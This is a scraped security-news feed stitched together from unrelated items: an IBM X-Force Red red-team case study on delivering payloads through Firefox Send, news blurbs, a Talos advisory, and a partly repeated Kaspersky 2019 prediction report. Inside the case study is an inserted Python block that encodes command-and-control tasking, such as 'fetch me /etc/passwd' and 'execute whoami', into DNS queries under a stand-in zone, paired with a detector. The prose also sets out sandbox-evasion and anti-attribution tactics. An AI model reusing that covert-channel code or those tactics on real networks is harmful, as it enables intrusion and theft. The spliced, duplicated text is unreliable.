Based on python, the Veil-Framework is one of the most popular tools for Anti-Virus evasion. You can generate many different

Veil-Framework – Open Source Tool to Bypass Common Anti-Virus Solutions on Latest Hacking News.

Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red

As you may know, IBM X-Force Red is IBM Security’s penetration testing team. The team features professional, world-class testers who help organizations find and manage their security vulnerabilities on any and all platforms, including software and hardware devices. Our motto is “hack anything to protect everything.”

This post features a case study from IBM X-Force Red that shows how we ran into trouble on a black-box penetration testing assignment, worked against a well-prepared blue team, and overcame the obstacles to ultimately establish a solid adversarial operation. Let’s take a closer look at what we did to get through security and, more importantly, what your team can do to better secure your organization in an ever-evolving adversarial landscape.

A Tale of an Undeliverable Payload

On one of our red team’s recent engagements with a customer’s blue team, we were tasked with delivering a malicious payload to network users without setting off security controls or alerting the defensive team.

As a first attempt, we sent a phishing email to feel out the level of awareness on the other side. The email message was rigged with our malicious payload, for which we selected the attachment type and a lure that would appear credible. However, the blue team on the other side must have been lying in wait for suspicious activity. Every one of our emails was delivered, but our payloads were not. The payloads did not call home to the control server we had set up, and we started getting visits from the defensive team in the form of an anti-malware sandbox.

Within minutes, additional sandboxes hit on our command and control (C&C) server’s handler, and soon more than 12 security vendor clouds were feasting on the payload. We understood at that point that our payload had been detected, analyzed and widely shared by the blue team, but since this was a black-box operation, we had little way of knowing what went wrong after sending out our rigged emails.

If the Phish Fails, Send in the Fox

Going back to the drawing board, we realized that we must have triggered the blue team’s dynamic malware detection systems and controls. We had to find a new way to deliver the payload in a more concealed manner — preferably encrypted — and to have it detonate only when it reached its final destination to prevent premature discovery.

To do so, we had to overcome some hurdles, including:

  • Sidestepping traffic inspection controls;
  • Opening a siloed channel to send information from outside into the organizational networks;
  • Decreasing repeatable sampling of our externally hosted content;
  • Minimizing the chance of attribution at the initial visit/download/delivery stages; and
  • Bypassing URL inspections.

Some creative thinking summoned a good candidate to help us overcome most controls, mostly because it is a legitimate service that people use in daily interactions: Mozilla’s Firefox Send (FFSend).

Before we continue to describe the use of FFSend, we would like to note here that it is a legitimate tool that can be used safely, and that it was not compromised. We also disclosed information in this blog to Mozilla ahead of its publication and received the company’s support.

The Right Fox for the Job

FFSend is a legitimate file transfer tool from Mozilla. It has several interesting features that make it a great tool for users: when a file is sent through it, its developers say it generates “a safe, private and encrypted link that automatically expires to ensure your stuff does not remain online forever.” This makes FFSend a useful way to send private files between people in a secure manner.

To send a file, the sender, accessing FFSend via a browser, uploads the file he or she wants to share with the recipient through a simple web interface. He or she receives a URL for a shared link and can send it to the recipient. The recipient visits the shared link and downloads the file, at which point the FFSend service “forgets” the link and removes shared content from the server.

Figure 1: Basic flow of events using FFSend

From our red team’s perspective, FFSend was a good fit for sending encrypted files. Let’s see how it answered some of the needs we defined.

FFSend allows file sizes of up to 1 GB, which is enough room both to send a payload and to exfiltrate data. This answered our need for a siloed, covert channel into the organization. It encrypts and decrypts the payload with AES-GCM directly in the browser, so we would not have to deal with any key generation or distribution. Because the file is encrypted before it leaves the sender's browser and decrypted only in the recipient's, the payload would evade inspection by intercepting proxies that unwrap Transport Layer Security (TLS), and it would remain private and would not be shared with any party along the way, including Mozilla.

Figure 2: Schematic view of FFSend’s automated encryption

Since firefox.com is a trusted domain on most organizational controls, we gain yet another advantage by using FFSend. We won’t have to labor to set up a fake site that would raise suspicion, and we can still get our file’s link across to the recipient. The trusted Firefox domain is also more likely to slip through URL inspection and anti-phishing controls, as well as blacklists that organizations deploy to catch malicious content coming from rogue resources.

Figure 3: FFSend is considered a trusted source

As for reducing repeated sampling of the payload, we get that as well by setting a strict one-time-only limit on the number of downloads allowed for our FFSend link after it is generated, which defeats the sandbox attempts and threat sharing. Moreover, FFSend automatically expires links after 24 hours, which effectively makes the path to our payload self-destruct if the target has not opened it. Self-destruction is also exposed through FFSend's application programming interface (API), so it can be ordered ad hoc after a link is sent but before its default expiration.

Figure 4: FFSend’s link expiration and self-destruct schema

Avoiding attribution is also easier when using a legitimate service that implements ephemeral storage of the files it delivers. Using such a service allowed us to avoid any links back to our testers, since there was no account required to send a file, nor was information on the owner of the encrypted data sent, required or kept.

This meant our ownership of the malicious file would be anonymous, though there would still be a tie to our originating IP address and browser fingerprints. With most information concealed, we deemed this level of anonymity good enough for the desired outcome.

Figure 5: No sender identity required, no attribution links back to red team

Setting Up a Communications Channel

With the file sending issue resolved, we still needed a covert communication channel to help us establish an ongoing operation without being ousted by the blue team.

To set up a communications channel, we did not wish to start from scratch. We decided to use FFSend to make it work as the siloed, covert channel we needed. That was one problem solved, but to coordinate the sending and receiving of data over that channel, we would also need a side channel of communications to avoid inspection and detection.

Communication gets inspected by a number of security controls, so it is essential that we blend in with the environment. To do that, we would have to choose a communication protocol that would allow us to look like everyone else on the network. Looking at the typical choices — Hypertext Transfer Protocol Secure (HTTPS), Internet Control Message Protocol (ICMP) and Domain Name System (DNS) — we selected DNS for its decent packet capacity and overall better chance of blending in with legitimate user traffic.

DNS fit our need for a side channel to coordinate the FFSend data channel: the command channel can be offloaded to DNS. To keep everything consistent, DNS record content could be encrypted with the same FFSend shared key used to post the data link.

In our command protocol, we can accommodate short instructions and differentiate between the types of requests we want to task agents with, to run or receive responses on. For example, we can encode instructions such as fetch me <file> or execute <command>. The agent would then carry out the request and post the results over our FFSend data channel.

On the wire side, channel interaction will look like a well-formed dynamic DNS request, separate from an HTTPS channel used for data. This split would ensure avoiding traffic correlation.

The Foxtrot Control Server Rises

Once we knew how to set up our covert communications, we set up a rogue control server and named it Foxtrot. Foxtrot was a mechanism we used to facilitate communication between any number of the remote agents.

Having created Foxtrot with a modified FFSend service and a DNS side channel, IBM X-Force Red testers were able to push the initial payload to unsuspecting recipients. The payload circumvented dynamic defenses, helped our red team gain a foothold in the environment and established persistence to freely move data across intercepting proxies. We were also able to execute commands on compromised hosts, even when the defensive team had its security controls and monitoring turned on.

A Word to the Wise Defender

Red teams have the advantage of only needing to find one way in, while blue teams are tasked with securing all ways in and out. This one-sided advantage means that defenders have to keep a close eye on attack tactics, techniques and procedures (TTPs) and expect encryption and covert side channels to challenge existing automated controls.

After having achieved our goals, we came away with some tips for defenders that can help security teams prepare for the TTPs we used.

  • Expect to see the use of client-side encryption gain more prominence in adversarial workflows, and choose security controls accordingly.
  • Expect to see split-data and command channels grow in popularity among attackers, because this technique can help break automated analysis patterns employed by traditional security tools. Defenders should look into behavioral, heuristics-based detection, augmented by a fully staffed security operations center (SOC) to continuously detect split-channel operations.
  • X-Force Red encourages defensive teams to test their incident response (IR) processes against simulated attacker workflows that employ custom tooling capabilities.
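The DNS command channel described under "Setting Up a Communications Channel" and the split-channel detection advice in the list above, as one added example that is not Foxtrot or any other X-Force Red code: a minimal DNS tasking channel of the kind the post describes (short instructions packed into query labels under a zone the operator controls) beside the kind of behavioural check a SOC could run over resolver logs to spot it. The zone example.net, the agent identifier, the log format and every log line are constructed for the example; the real channel also encrypted record contents with the FFSend shared key, a step omitted here.

```python
"""Added example, not X-Force Red's Foxtrot code: a minimal DNS command channel
of the kind the post describes, plus a behavioural check over resolver logs
that a SOC could use to spot it. Zone, agent id, log format and log lines are
constructed for the example."""
import base64
import math
from collections import defaultdict

C2_ZONE = "example.net"   # hypothetical zone under the operator's control
MAX_LABEL = 63            # RFC 1035 label limit
MAX_QNAME = 253           # RFC 1035 name limit


def encode_command(agent_id, command):
    """Pack one short instruction ('fetch me <file>', 'execute <cmd>') into a
    query name. base32 is used because DNS names are case-insensitive and
    limited to letters, digits and hyphens. (The real channel also encrypted
    this content with the FFSend shared key; that step is omitted here.)"""
    payload = base64.b32encode(command.encode()).decode().rstrip("=").lower()
    labels = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
    qname = ".".join(labels + [agent_id, C2_ZONE])
    if len(qname) > MAX_QNAME:
        raise ValueError("instruction too long for one query name")
    return qname


def decode_command(qname):
    """Inverse of encode_command; returns (agent_id, command)."""
    labels = qname.lower().split(".")
    zone_len = C2_ZONE.count(".") + 1
    agent_id = labels[-zone_len - 1]
    payload = "".join(labels[:-zone_len - 1]).upper()
    payload += "=" * (-len(payload) % 8)       # restore base32 padding
    return agent_id, base64.b32decode(payload).decode()


def label_entropy(label):
    """Shannon entropy of a label in bits per character."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log_line(line):
    """Constructed log format: '<timestamp> <client> <qname> <qtype>'."""
    ts, client, qname, qtype = line.split()
    return {"ts": ts, "client": client, "qname": qname.rstrip(".").lower(), "qtype": qtype}


def flag_tunnel_candidates(lines, min_unique=3, min_label=20, min_entropy=3.5):
    """Group queries by zone (approximated as the last two labels; use a public
    suffix list in production) and flag zones that receive many distinct
    subdomains whose labels are unusually long or high-entropy. Legitimate
    hostnames are short and repetitive; encoded payloads are neither."""
    per_zone = defaultdict(set)
    for line in lines:
        labels = parse_log_line(line)["qname"].split(".")
        if len(labels) < 3:
            continue                         # nothing below the zone apex
        per_zone[".".join(labels[-2:])].add(".".join(labels[:-2]))
    flagged = {}
    for zone, subs in per_zone.items():
        if len(subs) < min_unique:
            continue
        longest = [max(len(l) for l in s.split(".")) for s in subs]
        entropy = [max(label_entropy(l) for l in s.split(".")) for s in subs]
        mean_len = sum(longest) / len(longest)
        mean_ent = sum(entropy) / len(entropy)
        if mean_len >= min_label or mean_ent >= min_entropy:
            flagged[zone] = {"unique_subdomains": len(subs),
                             "mean_longest_label": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2)}
    return flagged


# Constructed resolver log: ordinary lookups plus three tasking queries.
COMMANDS = ["fetch me /etc/passwd", "execute whoami", "fetch me /etc/hosts"]
SAMPLE_LOG = [
    "2018-11-20T10:00:01Z 10.0.0.5 www.example.com A",
    "2018-11-20T10:00:02Z 10.0.0.5 mail.example.com A",
    "2018-11-20T10:00:03Z 10.0.0.6 cdn-assets.example.com A",
    "2018-11-20T10:00:04Z 10.0.0.7 www.example.com A",
] + ["2018-11-20T10:01:%02dZ 10.0.0.9 %s TXT" % (i, encode_command("a1", c))
     for i, c in enumerate(COMMANDS)]

if __name__ == "__main__":
    for line in SAMPLE_LOG[-3:]:
        print(decode_command(parse_log_line(line)["qname"]))
    print(flag_tunnel_candidates(SAMPLE_LOG))
```

The detector deliberately scores the zone rather than any single query: one long label is noise, but a zone that keeps receiving distinct, long, high-entropy names from the same host is the signature of tasking traffic, whatever it is encrypted with. In a real deployment the thresholds would be tuned against the organisation's own baseline, and the hits correlated with the HTTPS side (here, FFSend downloads) that the post split off to frustrate exactly this kind of single-channel analysis.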

What can teams do right now to get ahead of determined threat actors? Step up your security with pre-emptive action in the shape of professional penetration testing, and make sure the scope of the testing gradually covers both hardware and software. You should also consider adopting cognitive solutions to augment analysts’ capabilities and scale up as attacks grow more frequent and complex.

The post Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red appeared first on Security Intelligence.

Synthetic Fingerprints Make Biometric/Fingerprint Recognition Systems Vulnerable

From smartphone lock systems to identity verification, people consider fingerprint scans a viable method of security. However, scientists have figured

Synthetic Fingerprints Make Biometric/Fingerprint Recognition Systems Vulnerable on Latest Hacking News.

mitmAP – An Open Source Tool to Create a Fake Access Point and Sniff Data

The Evil Access Point (AP) attack has been around for a long time. There are several ways to create this

mitmAP – An Open Source Tool to Create a Fake Access Point and Sniff Data on Latest Hacking News.

SecurityWeek RSS Feed: DoS Vulnerabilities Impact Linux Kernel

Two recently disclosed Linux kernel vulnerabilities that remain unpatched could be exploited for local denial-of-service (DoS).

The flaws, both of which were made public last week, impact Linux kernel 4.19.2 and previous versions. Both are NULL pointer dereference bugs that can be exploited by local attackers and are considered Medium severity.


U.S. Postal Service API Flaw Exposes Data of 60 Million Customers

The United States Postal Service (USPS) has fixed an API flaw that potentially exposed data on 60 million customers. A researcher reported the flaw to USPS more than a year ago, but it wasn't until security blogger Brian Krebs contacted the organization this month that it took any action.

Frustrated Fallout 76 Player Cursed With Permanent God Mode Due To A Bug

Game glitches, particularly those inadvertently endowing benefits to the players are usually loved. For instance, the bug in the Red

Frustrated Fallout 76 Player Cursed With Permanent God Mode Due To A Bug on Latest Hacking News.

Microsoft Fixed Outlook 2010 Crashes Triggered By November Patch Tuesday

While an update bundle supposedly addresses flaws, Microsoft November Patch Tuesday didn’t seem so good for users. After the update,

Microsoft Fixed Outlook 2010 Crashes Triggered By November Patch Tuesday on Latest Hacking News.

Apache Hadoop YARN NodeManager Daemon Falls Prey To Zip Slip Vulnerability

A few months ago, researchers discovered the Zip Slip vulnerability that could trigger remote code execution attacks. As disclosed at

Apache Hadoop YARN NodeManager Daemon Falls Prey To Zip Slip Vulnerability on Latest Hacking News.

VMWare Patched Critical Vulnerability In Workstation And Fusion

Recently, VMware patched critical vulnerability affecting its Workstation and Fusion software. The bug could allegedly allow an attacker to execute

VMWare Patched Critical Vulnerability In Workstation And Fusion on Latest Hacking News.

Ethereum Vulnerability Allowed Minting GasToken To Sweep Crypto Exchanges

A recently discovered Ethereum vulnerability could have allowed hackers to drain a huge amount of money from crypto exchanges. The

Ethereum Vulnerability Allowed Minting GasToken To Sweep Crypto Exchanges on Latest Hacking News.

Adobe Patched A Critical Flash Player Vulnerability Disclosed Publicly

Adobe Flash Player vulnerabilities and their subsequent patches are no surprise to us. Once again, Adobe has patched a critical

Adobe Patched A Critical Flash Player Vulnerability Disclosed Publicly on Latest Hacking News.

Xerosploit – Open Source Toolkit For Man In The Middle Attacks

Xerosploit is a python-based toolkit for creating efficient Man In The Middle attacks which combines the power of bettercap and

Xerosploit – Open Source Toolkit For Man In The Middle Attacks on Latest Hacking News.

Facebook And Instagram Went Down Due To A Server Bug

Facebook makes it into the news once again for troubling users globally. Supposedly, Facebook users have faced trouble with Instagram

Facebook And Instagram Went Down Due To A Server Bug on Latest Hacking News.

WordPress Exploit in GDPR Plugin Puts 100,000 Websites at Risk

More than 100,000 websites were affected by a vulnerability in a WordPress plugin that was designed to help site owners comply with the General Data Protection Regulation (GDPR).

Researchers from Wordfence also reported evidence of attacks in which malicious third parties installed their own administrator accounts on various sites. Though the full scope of how cybercriminals might use this access is unknown, it could enable them to install malware and hijack sites to use in phishing schemes.

The plugin, called WP GDPR Compliance, was initially removed from the WordPress plugin repository after the WordPress exploit was discovered. A patched version has since been made available.

WordPress Exploit Enables Attackers to Hijack Websites

WP GDPR Compliance was created to address some requirements in the legislation around requests for data access and how data is deleted from WordPress-hosted sites. A bug in the system that registers new users, however, enables threat actors to create their own accounts. This gives them full privileges to control what happens on the site and lets them cover their tracks by disabling the same feature and locking out legitimate site owners.

A second use of the WordPress exploit involves manipulating WP-Cron, WordPress's built-in task scheduler, which enables attackers to create other entry points through which to take control of a site.

This WordPress exploit affects WP GDPR Compliance versions up to and including 1.4.2. The patched version, 1.4.3, is now available within the WordPress plugin repository.

How Can Site Owners Protect Their Accounts?

Along with theme directories, plugins are a highly popular avenue for attack on WordPress sites. According to IBM X-Force, for example, directory references to “plugins” were found in close to 40 percent of the WordPress URLs where malware or other files had been discovered.

The risks associated with the WP GDPR Compliance plugin reinforce the importance of proactive patching. However, security experts also suggest proactively scanning such sites for potential anomalies, which could include changes in files or, in this case, new admin accounts.

Sources: WordFence, WeLiveSecurity

The post WordPress Exploit in GDPR Plugin Puts 100,000 Websites at Risk appeared first on Security Intelligence.

Vulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processor


A member of Cisco Talos discovered these vulnerabilities.

Executive summary

Today, Cisco Talos is disclosing three remote code execution vulnerabilities in the Atlantis Word Processor. Atlantis Word Processor is a traditional word processor that provides a number of basic features for users, in line with what is in other similar types of software. This application is written in Delphi and keeps the majority of its capabilities in a single, relocatable binary. An attacker could exploit these vulnerabilities to corrupt the memory of the application, which can result in remote code execution in the context of the application.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlantis to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Atlantis Word Processor open document format NewAnsiString length remote code execution vulnerability (TALOS-2018-0711/CVE-2018-4038)

The word processor contains an exploitable arbitrary write vulnerability in the open document format parser while trying to null-terminate a string. A specially crafted document could allow an attacker to pass an untrusted value as a length to a constructor, which miscalculates a length and then uses it to calculate the position to write a null byte. This particular bug lies in the `NewAnsiString` function.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor Huffman table code length remote code execution vulnerability (TALOS-2018-0712/CVE-2018-4039)

Atlantis Word Processor contains an out-of-bounds write vulnerability in its PNG implementation. When opening a specially crafted document, which would need to be supplied by an attacker, the application fingerprints it in order to determine the correct file format parser. Eventually, an attacker could corrupt memory, which would allow them to execute arbitrary code in the context of the application. A user only needs to open the document to trigger this vulnerability.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability (TALOS-2018-0713/CVE-2018-4040)

An exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Processor. A specially crafted document can cause certain RTF tokens to dereference an uninitialized pointer and then write to it. When opening an RTF document, the application first fingerprints it in order to determine the correct file format parser. Eventually, this would corrupt the memory of the application, allowing an attacker to execute code in the context of the application.

For more information on this vulnerability, read the full advisory here.

Versions tested

Talos tested and confirmed that Atlantis Word Processor, version 3.2.7.2 is affected by these vulnerabilities.

Conclusion

All three of these vulnerabilities are triggered by the user opening a malicious, specially crafted document. The easiest way to avoid these issues is for the user to ensure that they don’t open any documents from untrusted sources. The latest update from Atlantis will also cover these vulnerabilities, as will the Snort rules listed below.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48385, 48386, 48389 - 48392

Attackers Target Drupal Web Servers with Chained Vulnerabilities

A recent attack targeted Drupal web servers with a chain of vulnerabilities that included the infamous Drupalgeddon2 and DirtyCOW flaws, Imperva security researchers say.

The attack was short and impacted only some Linux-based systems, but it was noteworthy for attempting to persistently infect vulnerable servers and take over machines.

Securelist: Kaspersky Security Bulletin: Threat Predictions for 2019

There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.

Asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.

No more big APTs

What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?

The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.

Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them, something that doesn't seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there's still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.

Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.

Some operations are simply externalized to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. Technical capabilities and tools are owned by the private industry in this scenario, and they are for sale for any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.

All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.

Networking hardware and IOT

It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even though the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.

Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.

Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.

All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.

One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.

Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.

Public retaliation

One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.

Investigations into recent high-profile attacks, such as the Sony Entertainment Network hacks or the attack on the DNC, culminated in a list of suspects being indicted. That results not only in people facing trial but also a public show of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.

Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.

However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadowbrokers. We expect more to come.

What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.

Emergence of newcomers

Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.

The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.

There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.

One interesting aspect worth considering from a more technical angle is how JavaScript post-exploitation tools might find a new lease of life in the short term, given the difficulty of limiting its functionality by an administrator (as opposed to PowerShell), its lack of system logs and its ability to run on older operating systems.

The negative rings

The year of Meltdown/Specter/AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary as it would be invisible to almost all the security mechanisms we have.

For instance, in the case of SMM there has at least been a publicly available PoC since 2015. SMM is a CPU feature that would effectively provide remote full access to a computer without even allowing Ring 0 processes to have access to its memory space. That makes us wonder whether the fact that we haven’t found any malware abusing this so far is simply because it is so difficult to detect. Abusing this feature seems to be too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.

We see a similar situation with virtualization/hypervisor malware, or with UEFI malware. We have seen PoCs for both, and HackingTeam even revealed a UEFI persistence module that’s been available since at least 2014, but again no real ITW examples as yet.

Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.

Your favorite infection vector

In probably the least surprising prediction of this article we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the nearest future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.

Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, some attacker using the stolen credentials of some close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.

This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.

Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.

Destructive destroyer

Olympic destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack. Or simply as a nasty surprise for the victim.

Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.

Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation for instance, governments might use them as a response ranged somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.

ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.

Advanced supply chain

This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.

Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.

Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.

What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.

However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.

It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.

All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants we believe it is extremely unlikely to happen and if it does, we will probably never know….

And mobile

This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.

Even though successful infections for iPhone requires concatenating several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find some creative ways to circumvent security on such devices using, for instance, rogue MDM servers and asking targets through social engineering to use them in their devices, providing the attackers with the ability to install malicious applications.

It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.

In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.

The other things

What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak error-prone humans and replacing them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?

Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?

Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?

There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea, I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.

We are here to try and anticipate, to understand the attacks we don’t, and to prevent them from occurring in the future.

Full report “Kaspersky Security Bulletin: Threat Predictions for 2019” (English, PDF)



Securelist

Kaspersky Security Bulletin: Threat Predictions for 2019

There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.

After asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.

No more big APTs

What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?

The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.

Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them – something that doesn’t seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there’s still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.

